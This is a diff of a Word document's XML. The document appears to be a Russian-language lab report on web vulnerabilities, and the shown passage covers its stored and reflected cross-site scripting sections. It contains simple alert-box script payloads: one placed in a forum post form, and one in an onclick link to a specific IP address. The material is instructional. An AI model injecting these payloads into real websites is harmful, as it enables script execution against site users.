@@ -12568,114 +12680,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>&lt;/form&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Cross Site Scripting (Persistent)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>На сайте есть возможность есть форма, где пользователи могут создавать и публиковать свои посты. На сайте сохраняется содержимое поста в базе данных и отображает его на странице без должной фильтрации.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>Добавление скрипта на форуме:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="709"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>&lt;!--</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Форма создания поста --&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>&lt;form action="/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12683,9 +12690,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>&lt;form action="/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>create_post</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12693,9 +12700,19 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>create_post</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>" method="POST"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12703,19 +12720,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>" method="POST"&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">    &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12723,9 +12730,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">    &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>textarea</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12733,9 +12740,16 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>textarea</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> name="content"&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Мой</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12743,7 +12757,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> name="content"&gt;</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12751,7 +12765,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Мой</w:t>
+        <w:t>новый</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12762,13 +12776,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>новый</w:t>
+        <w:t>пост</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12777,17 +12792,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>пост</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>!&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12795,9 +12802,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>!&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12805,9 +12812,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>textarea</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12815,9 +12822,19 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>textarea</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12825,19 +12842,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">    &lt;button type="submit"&gt;&lt;script&gt;alert('XSS!</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12845,9 +12852,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">    &lt;button type="submit"&gt;&lt;script&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>');&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12855,334 +12862,324 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>alert(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t>/script&gt;&lt;/button&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>'XSS!');&lt;/script&gt;&lt;/button&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>&lt;/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>form</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>form</w:t>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Выведет ссылку, при нажатии на которую запуститься скрипт - окно предупреждение</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Cross</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Site</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Scripting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Reflected</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Пример запуска </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> на сайте с использованием специально сформированного </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> запроса в поле "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Search</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>":</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Выведет ссылку, при нажатии на которую запуститься скрипт - окно предупреждение</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Cross</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Site</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Scripting</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Reflected</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Пример запуска </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>javascript</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> на сайте с использованием специально сформированного </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>javascript</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> запроса в поле "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Search</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>":</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="709"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-      </w:pPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">&lt;a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">&lt;a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>href</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>href</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">="http://92.51.39.106:8060/" </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">="http://92.51.39.106:8060/" </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>onclick</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>onclick</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>="</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>alert</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>alert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve">'Это вредоносное сообщение!'); </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">'Это вредоносное сообщение!'); </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>return</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>return</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>false</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>false</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
